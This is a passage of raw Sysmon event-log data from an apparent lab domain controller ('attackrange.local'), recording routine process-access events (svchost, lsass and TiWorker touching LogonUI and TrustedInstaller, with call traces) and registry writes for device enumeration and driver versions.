1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000004217Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.155{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000004216Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.155{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004215Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.155{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004214Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.155{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000004213Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2021-03-31 12:02:11.155{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Enum\SWD\ScDeviceEnumBus\1\FriendlyNameMicrosoft Passport Container Enumeration Bus 13241300x80000000000000004212Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localInvDB-DriverVerSetValue2021-03-31 12:02:11.139{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Control\Class\{62f9c741-b25a-46ce-b54c-9bccce08b6f2}\0003\DriverVersion10.0.14393.0 13241300x80000000000000004211Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2021-03-31 12:02:11.139{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Enum\SWD\ScDeviceEnumBus\0\FriendlyNameSmart Card Device Enumeration Bus 13241300x80000000000000004210Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localInvDB-DriverVerSetValue2021-03-31 12:02:11.139{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Control\Class\{62f9c741-b25a-46ce-b54c-9bccce08b6f2}\0002\DriverVersion10.0.14393.0 10341000x80000000000000004209Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.108{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004208Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.108{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004207Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.108{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004206Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.108{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004205Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.108{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004204Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.108{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004203Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.108{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004202Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.108{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004201Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.108{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004200Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.108{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004199Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.108{266CAFBE-646C-6064-0F00-00000000AE01}11164376C:\Windows\System32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\termsrv.dll+a1087|c:\windows\system32\termsrv.dll+6aa58|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004198Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.108{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004197Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.108{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004196Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.108{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004195Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.108{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004194Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.093{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004193Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.093{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004192Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.093{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004191Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 